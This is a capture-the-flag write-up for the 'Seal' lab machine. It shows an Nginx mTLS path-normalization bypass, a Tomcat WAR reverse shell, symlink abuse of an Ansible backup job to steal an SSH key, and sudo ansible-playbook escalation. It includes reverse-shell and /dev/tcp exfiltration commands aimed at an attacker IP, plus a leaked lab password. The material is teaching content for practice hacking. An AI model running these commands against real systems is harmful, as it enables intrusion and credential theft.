PRIMARY CATEGORY → MEDIUM

Summary

  • Domain/Subdomain Extraction from a TLS Certificate’s Common Name Section using OpenSSL
  • Web Content Fuzzing (Gobuster)
  • GitBucket Repository Inspection
  • Information Leakage/Disclosure on GitBucket via Git Logs
  • Nginx Virtual Host Configuration File Inspection
  • Understanding mTLS and its implementation in Nginx
  • Nginx mTLS Bypass leveraging the differences in Normalization and URL parsing between Nginx and Tomcat
  • RCE in Tomcat’s Manager via .WAR file deployment leveraging Nginx mTLS Bypass
  • Local PE through an Arbitrary File Read via an Ansible Playbook Cron Job leveraging Symlinks
  • Monitoring of system processes using PSpy
  • Several methods of connecting via SSH using Key Authentication
  • Local PE via Sudo Privileges (Ansible-Playbook)


Setup

Directory creation with the Machine’s Name

mkdir Seal && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

  • About 64 → Linux
  • About 128 → Windows
ping -c1 10.10.129.95.190

As mentioned, according to the TTL, It seems that It is a Linux Target

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.95.190

Open Ports → 22, 443 and 8080

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

extractPorts allPorts

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p22,443,8080 -sCV -n -Pn --disable-arp-ping -oN targeted 10.129.95.190
OS Version (Codename)

In Linux Systems, the Operative System Version could be extracted through Launchpad

According to the Version Column Data of the Comprehensive Scan, proceed as follows →

  • 22 - SSH

Reference

OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 site:launchpad.net
  • 443 - HTTPS

Reference

nginx 1.18.0 site:launchpad.net

Codename → Ubuntu Focal

This can be verified once the shell is obtained, i.e. the system has been compromised

There are several ways to carry out it →

cat /etc/os-release
hostnamectl # If System has been booted via Systemd
lsb_release -a
cat /etc/issue
cat /proc/version
22 - SSH

OpenSSH Version → 8.2

The Version of the Service running can also be obtained via Banner Grabbing as follows →

nc -v 10.129.95.190 22 <<< ""

In this case, nothing interesting is extracted

443 - HTTPs
Web Technologies

We start gathering the Web Technologies running behind the Website to know exactly what we are facing this time

We can carry out this task by using tools such as whatweb or curl

curl --silent --request GET --location --insecure --head 'https://10.129.95.190'

There is a Nginx running on the remote machine, perhaps as a reverse proxy, and then, it should be an Upstream Web Server such as Apache or Tomcat

If it is the case, we should be aware that the way the two web servers interpret the routes may be diffferent and the normalisation they do of the routes

whatweb https://10.129.95.190

And we have a domain filtered through an email account

We could extract another domain or subdomain by inspecting the Common Name section of the TLS Certificate issued for target’s website

We could achieve this using openssl s_client and openssl x509 as follows

openssl x509 -noout -subject < <( openssl s_client -connect 10.129.95.190:443 2> /dev/null 0>&2 )

Nothing new here…

However, it is possible that the Web Server has configured a Virtual Host related to this domain

Therefore, we will add this domain to the /etc/hosts file

printf "10.129.95.190\tseal.htb" >> /etc/hosts

We can check if the output of whatweb is the same as for the IP Address

whatweb https://seal.htb

And it seems that it does

Another way to validate this is by extracting the amount of total characters in the HTTP Response

To do this, proceed as follows →

curl --silent --location --request GET --insecure 'https://10.129.95.190' | wc -c
curl --silent --location --request GET --insecure 'https://seal.htb' | wc -c

And the output is the same, thus, the same content is delivered for both the IP Address and the domain

Browser-based Inspection

If we access to this URL from the browser → https://10.129.95.190, the following content is delivered and rendered

The wappalyzer addon reports these Web Technologies

Nothing new compared to whatweb

We could check which is the Server-Side Programming Language by requesting resources such as an index.php

We got a 404 Error but we now know that the upstream web server is an Apache Tomcat

When someone is facing a Tomcat, the first thing we should probably do is trying to access the Tomcat’s manager

The URL is usually http[s]://domain.tld/manager/html

But, if we try to access the above resource, we get a 403 Forbidden Error from Nginx

We could fuzz the existent web resources on this website

This way we can validate if there are more resources where we get a 403 Forbidden Error

We use gobuster for this task

gobuster dir --no-tls-validation --add-slash --threads 200 --output webScan.gobuster --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://10.129.95.190

And the other resources do not give a 403 error, but we do not know for sure because the follow a redirection

Thus, we can make an HTTP Request to one of the above URLS following the redirection and see what the status code is

curl --silent --request GET --location --insecure --head 'https://10.129.95.190/admin'

And we get the same, It’s a bit odd to be honest

However, we can continue fuzzing the admin directory as it looks interesting

gobuster dir --no-tls-validation --extensions html --threads 150 --output webScan.gobuster --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://10.129.95.190/admin/

And there is a dashboard.html file, which gives a 403 Forbidden Error

So, there might be several location directives in the Virtual Host file which contains some sort of validation

  • location /manager/html

  • location /admin/dashboard

Or something like that

It looks that this validation gives a 403 Error if a certain condition is not met

The Home page is an static one i.e. there is no URL which redirects to another content

All the URLs redirects to another section of the same page

The only interesting features are the following ones →

  • A search bar

  • A Contact Form

Neither does nothing

The only interesting things so far are the /manager/html and the /admin/dashboard

But both of them give a 403 Error

Therefore, let’s continue with the next HTTP Port

8080 - HTTP
Web Technologies

As we did before, let’s use whatweb and curl

curl --silent --request GET --location --head 'http://10.129.95.190:8080'
HTTP/1.1 401 Unauthorized

Nothing interesting apart from the 401 Unauthorized Error

whatweb http://10.129.95.190:8080

The same…

Information Leakage on GitBucket through git logs

If we take a look at the website from the browser, we see that it is running GitBucket as the Web Application

There is a login form and we can do nothing until we log into the application

Since we do not have a valid account, we will create a new one with the following data

Once logged in, we can browse the repositories section. And we have the following →

Two repositories and several activity related to both repositories and certain users → Luis and Alex

Inspecting both repositories, the so-called Infra does not have much

However, there are bunch of interesting things in the commits section of the seal_market repository

If we browse the repository files corresponding to the commit made by Luis, whose comment is Updating tomcat configuration, we can see the content of the tomcat-users.xml file inside the tomcat directory

Note that this file usually contains some type of credentials related to the /manager/html panel or something similar

In this case we have the credentials of the user tomcat who has manager-gui and admin-gui roles

User Tomcat
Password 42MrHBf*z8{Z%

Although, remember that we cannot access to the /manager/html due to the 403 Forbidden Error to check the above credentials

If we keep inspecting the commits section and the corresponding files on those timelines, we come across with the nginx’s default configuration file in the Updating nginx configuration commit

We now know exactly what is happening

Let’s start from the beginning

server {
	...
	root /var/www/html;
	ssl_protocols TLSv1.1 TLSv1.2;
	ssl_verify_client optional;
	...
}

We see the ssl_verify_client directive, which enables the mTLS (Mutual TLS)

Notice that, in a TLS Connection, the server presents to the client its TLS Certificate and the client validates it by checking that everything is correct

But, in the mTLS, both parties validate their certificates. Therefore, the client must present its TLS Certificate to the server

The certificate presented by the client must be issued by the same CA that issued the Server Certificate

In this case, the value of this directive is optional instead of on. This allows to handle validation in other configuration blocks such as the location blocks

If the value of the directive were on, any client presenting an invalid certificate would be rejected by Nginx with a 400 Bad Request

location /manager/html {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}
 
location /admin/dashboard {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}
 
location /host-manager/html {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}

Since the ssl_verify_client parameter’s value is optional, if verification of the client’s certificate fails, the Web Server will not respond directly with a 400 Bad Request but will handle the validation in the corresponding location block, depending on the path of the requested resource

Then, if the verification fails, nginx will respond with a 403 Forbidden

That’s why we get 403 Forbidden when trying to access resources such as /html/manager or /admin/dashboard, because we enter the corresponding location block

location / {
	proxy_set_header        Host $host;
	proxy_set_header        X-Real-IP $remote_addr;
	proxy_pass          http://localhost:8000;
	...
}	

Any requested resource, whose URI does not match the three location blocks above, will be dropped to the location / block and passed directly to the backend web server, in this case Tomcat, via the proxy_pass directive

This is where the concept set out above comes into play

We said that, in a web server structure, where there is an nginx running as a reverse proxy, receiving all requests, and a backend web server, such as Apache or Tomcat, handling the requested dynamic content, the way they handle and normalise the urls may differ between them

Applied to /manager/html, we know that if we request this resource, that request will fall in the location /manager/html block and we will receive a 403 Forbidden as the mTLS validation will also fail

We can address this situation in two ways →

Assuming that the CA that issued the server certificate is installed on the same machine (Bad Practice!! 😅), if an LFI vulnerabilty is disclosed in any Web Server Application, an attacker could try to point to the path of the CA’s private key, extract its content and create, from its side, a valid certificate for the client that will be presented to the Web Server to pass mTLS validation

Or, in this case, we could investigate whether nginx and tomcat differ in URL normalisation. So, we could request a resource that contains /html/manager but does not match the path specified in the location /html/manager block, so this request will fall in the location / and be passed to Tomcat, which may interpret the requested URL correctly (as /html/manager)

A quick Google Search gives us these resources

Reference I    •    Reference II    •    Reference III


Exploitation

Nginx mTLS Bypass (Path Normalization) leads to RCE in Tomcat’s Manager via .WAR file deployment

So, according to the above resources and the following image →

Since the way nginx and tomcat parse the URL is different, we could do a little manipulation by adding characters such as ..; or an URL parameter /;name=orange/ within the requested path in order not to match with the /manager/html location block

https://domain.tld/manager;param=value/html

As mentioned, the /manager;param=value/html path will not match the /manager/html location block defined in nginx, so this request will fall into the / location block, passing it to tomcat

Tomcat will then parse the requested path as /manager/html, bypassing the mTLS validation by avoiding entering the location blocks containing the validation

Therefore, we request the following url →

https://10.129.95.190/manager;param=value/html

And we are asked for credentials to access the tomcat manager interface

Once we’re in, we have several ways to get Remote Code Execution to access the remote machine by stablishing a reverse connection

Reference

We can upload a WAR file containing a .JSP file which makes a reverse connection to the specified socket (IP Address:Port) inside it once the WAR file is deployed

Or the .JSP file could be a web shell

Thus, proceed as follows →

From the Attacker
  • Create a WAR Payload using MSFVenom
msfvenom --payload java/jsp_shell_reverse_tcp LHOST=10.10.16.37 LPORT=443 --platform linux --arch x64 --format war --out rev.war
  • Set up a Listening Socket using the port specified in the above command
netcat -nlvp 443
  • Upload the WAR Payload 😊

A new tomcat application called /rev should have been created

  • Make a request to the application path and Receive the reverse connection
curl --silent --location --request GET --insecure --output /dev/null 'https://10.129.95.190/rev/'

Shell as Web User

Once a connection via Reverse Shell is stablished, just proceed as follows to upgrade the obtained shell to a Fully Interactive TTY

Reference

Script
script /dev/null -c bash
<C-z>
stty raw -echo ; fg
reset xterm
export TERM=xterm-256color
export SHELL=/bin/bash
. /etc/skel/.bashrc
stty rows 61 columns 248

Privesc #1

Initial Non-Privileged User → Tomcat

Once we are inside, first of all, check all the system groups the current user belongs to

id

There is nothing interesting

Next, we check if the current user has any sudoers privileges assigned

sudo -l

And we get the following message, It’s a bit odd tbh

We can list the available directories in the /home directory

ls -l /home

And we have the luis user’s home directory. We extract the files readable by the current user

find /home/luis \( -path '*.gitbucket*' -o -path '*.cache*' \) -prune -o -type f -readable -ls 2> /dev/null

We could search for some juicy information within the .bashrc file, such as aliases or check for leaked credentials in the config file inside the jgit directory

But there is nothing interesting in these files

Looking for any software installed on the remote machine located in the /opt directory, we found the following content

find /opt -readable 2> /dev/null

The /opt/backups/playbook directory seems interesting

It contains an ansible playbook with the following content →

This ansible playbook has three different defined tasks

  • Copy Files → Uses the Synchronize module to copy the content from a certain system location to another

  • Server Backups → Compresses the specified directory or archive by leveraging of the Archive module

  • Clean → Remove an specific directory using the absent state of the File module

However, there is one thing about the Copy Files task that strikes me, it uses the ansible synchronize module to perform the copy operation

But, the copy_links option is set to yes, which means that it copies the actual file that the symlink points to instead of copying the symlink itself

This makes it vulnerable to a local privesc if there was a cron job being run by another user running the ansible-playbook binary with this playbook passed as an argument or if the current user had a sudoers privilege assigned that makes him capable of running the same as another user

synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes

The source of the sync task is /var/lib/tomcat9/webapps/ROOT/admin/dashboard

If we had write permissions on this directory, we could create a symbolic link pointing to a sensitive file

If another user runs this ansible playbook, we might be able to read arbitrary files from that user

Since the copy_links parameter is enabled, we create a symlink inside the writable folder pointing to a sensitive file owned by the effective user and the sync task will copy the actual file pointed to by the symlink instead of the symlink itself, as explained above

ls -l /var/lib/tomcat9/webapps/ROOT/admin/dashboard | grep -i -- uploads

And the uploads directory is world-writable, so we can create any file within it

We have already checked that the current user does not have any sudoers privilege

We can now list the processes that run at regular time intervals to check if a certain user, such as luis, runs this ansible-playbook

To achieve this task, just transfer a pspy binary to the remote machine

From the Attacker
  • Download the pspy binary
curl --silent --location --request GET 'https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64' --output pspy64
  • Build a Simple HTTP Server
python3 -m http.server 80
From the Target
  • Transfer the pspy binary and execute it
wget 'http://10.10.16.37/pspy64' -O /dev/shm/pspy
chmod 777 !$
!$

And if we wait a little bit, we get the following results →

sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml

And we see that root is executing the above commands as user luis

That command runs the analyzed ansible playbook

Therefore, since we have write permissions on the uploads directory, as mentioned, we could create a symlink pointing to a sensitive file owned by luis

This file could be, if exists, the /home/luis/.ssh/id_rsa

Thus, we could connect to the remote machine via SSH as luis

Note that the destination path of the sync task is /opt/backups/files

if we list the content of the /opt/backup directory, there is no files directory

Remember that all tasks defined in the ansible playbook are executed simultaneously

So, after the sync task is executed, the archive task compresses the content of the /opt/backup/files directory and stores the generated compressed file in the /opt/backup/archives directory

Subsequently, the clean task deletes the /opt/backup/files directory, which means that we have to extract the compressed file from the /opt/backup/files directory

Therefore, proceed as follows →

From the Target
  • Create a symlink in /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads pointing to /home/luis/.ssh/id_rsa
ln --symbolic /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis_rsa
  • Send the compressed file stored in /opt/backup/archives to the attacker
cat backup-2025-04-10-15:47:32.gz > /dev/tcp/10.10.16.37/443

First, we have to set a listening socket on the attacker using the specified port (443)

From the Attacker
  • Set a listening socket and redirect all incoming traffic to a file
nc -nlvp 443 > backup.gz
  • Gunzip the received file and check if the file pointed to by the created symlink exists
gunzip backup.gz
tar --list --file backup | grep -i -- 'luis'
  • Extract the above file from the tar file and check the content of the dashboard/uploads/luis_rsa file
tar -xvf backup dashboard/uploads/luis_rsa
cat ./dashboard/uploads/luis_rsa

And it looks like we have luis’ private key

Let’s try to connect to the remote machine via SSH using this key

We can proceed in two ways

#1

Specifying directly the path of the private key through the -i option

ssh -p22 -i ./dashboard/uploads/luis_rsa luis@seal.htb
#2

Uploading the private key in memory

eval "$( ssh-agent )"
ssh-add ./dashboard/uploads/luis_rsa
ssh-add -l
ssh -p22 luis@seal.htb

And we are in as luis! Grab the user.txt flag and continue 😊

cat ~/user.txt

Privesc #2 (If exists)

Non-Privileged User → Luis

Sudo Privileges (Ansible-Playbook)

As we did before, first check to which groups the current user belongs to

id

But the user does not belong to any interesting group

Next, we check the sudoers privileges assigned to luis

sudo -l

And we have that the user luis can run the binary /usr/bin/ansible-playbook as any user of the system without providing a password and passing it as argument any playbook

From the Attacker

So, we could create an ansible playbook containing a task which runs a system command like bash -c 'bash -i &> /dev/tcp/<IP_ADDRESS>/<PORT> 0&1'

Build another Simple HTTP Server with python to share the above resource

python3 -m http.server 80

And set up a listening socket using the TCP port specified in the created ansible playbook system command

nc -nlvp 443
From the Target

Download the created ansible-playbook

curl --silent --request GET --location --output /dev/shm/shell.yml 'http://10.10.16.37/shell.yml'

Execute the ansible-playbook binary as follows

sudo -u root /usr/bin/ansible-playbook /dev/shm/shell.yml

And we are in as Root! 😈

So, just grab the content of the root.txt flag and move on to the next machine! 😊

cat ~/root.txt